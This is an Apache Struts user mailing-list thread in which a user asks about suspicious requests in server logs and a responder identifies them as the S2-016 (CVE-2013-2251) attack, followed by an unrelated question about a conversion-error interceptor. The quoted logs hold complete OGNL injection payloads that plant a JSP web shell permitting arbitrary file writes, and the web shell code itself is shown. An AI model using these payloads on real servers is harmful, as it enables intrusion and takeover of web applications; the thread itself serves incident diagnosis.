Re: Suspicious Request
On 2/13/2018 3:57 PM, Rajvinder Pal wrote:
> I am using struts2 2.3.16.1 version. That may be the reason 404 error is
> returned. But still i got a new file "one.jsp", inside the WAR. It has
> only one IF condition as give below:-
>
> <%if(request.getParameter("f")!=null)(new
> java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
Oh! do you see above block at end of your index.jsp? If so then attacker
is or was enable to append this block there!
Firstly delete that block and try following to see if your webapp still
has this vulnerability via reproducing the attack:
> "GET
> /index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
> HTTP/1.1" 404 206 14249 0
> ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
> -
Re: Suspicious Request
On 2/13/2018 12:34 PM, Rajvinder Pal wrote: > Hi, > > I have a struts application deployed on application server. Some time I am > receiving the below requests in web server logs. Not sure if i can post it > in this struts forum. What should i do to restrict it?What kind of > vulnerability it is ? Hi, It seems it's S2-016 [1] (CVE-2013-2251 [2]). [1] https://cwiki.apache.org/confluence/display/WW/S2-016 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251 - To unsubscribe, e-mail: user-unsubscr...@struts.apache.org For additional commands, e-mail: user-h...@struts.apache.org
Re: Suspicious Request
Hi Yasser,
I am using struts2 2.3.16.1 version. That may be the reason 404 error is
returned. But still i got a new file "one.jsp", inside the WAR. It has
only one IF condition as give below:-
<%if(request.getParameter("f")!=null)(new
java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
Regards,
Raj
On Tue, Feb 13, 2018 at 5:43 PM, Yasser Zamani
wrote:
>
>
> On 2/13/2018 12:34 PM, Rajvinder Pal wrote:
> > Hi,
> >
> > I have a struts application deployed on application server. Some time I
> am
> > receiving the below requests in web server logs. Not sure if i can post
> it
> > in this struts forum. What should i do to restrict it?What kind of
> > vulnerability it is ?
>
> Hi,
>
> It seems it's S2-016 [1] (CVE-2013-2251 [2]).
>
> [1] https://cwiki.apache.org/confluence/display/WW/S2-016
> [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251
>
>
> -
> To unsubscribe, e-mail: user-unsubscr...@struts.apache.org
> For additional commands, e-mail: user-h...@struts.apache.org
>
Suspicious Request
Hi,
I have a struts application deployed on application server. Some time I am
receiving the below requests in web server logs. Not sure if i can post it
in this struts forum. What should i do to restrict it?What kind of
vulnerability it is ?
"GET
/index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
HTTP/1.1" 404 206 14249 0
?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
-
"GET
/index.php?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
HTTP/1.1" 404 207 1378 0
?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
-
"GET
/admin/index.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}
HTTP/1.1" 404 216 1634 0
?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}
-
Regards,
Raj
Conversion Error Interceptor prevent errors for empty values
Can someone provide some clarification on if this interceptor should be adding
a field error when an empty string is passed to a Integer in the action? I am
trying to prevent the field error from happening in this case. It looks like
it should not be happening according to the docs:
https://struts.apache.org/core-developers/conversion-error-interceptor.html ,
or am I not understanding what it is saying here:
"This interceptor extends ConversionErrorInterceptor but only adds conversion
errors from the ActionContext to the field errors of the action if the field
value is not null, "", or {""} (a size 1 String array with only an empty
String). See ConversionErrorInterceptor for more information, as well as the
Type Conversion documentation"
Paul R. Zepernick
Sr. Programmer Analyst
HealthSmart Benefit Solutions
Disclaimer: This communication and any files transmitted with it may contain
information that is privileged, confidential and/or exempt from disclosure
under applicable law. If you are not the intended recipient, you are hereby
notified that any disclosure, copying, distribution, or use of the information
contained herein (including any reliance thereon) is strictly prohibited. If
you received this communication in error, please immediately contact the sender
and destroy the material in its entirety, whether in electronic or hard copy
format. Thank you.
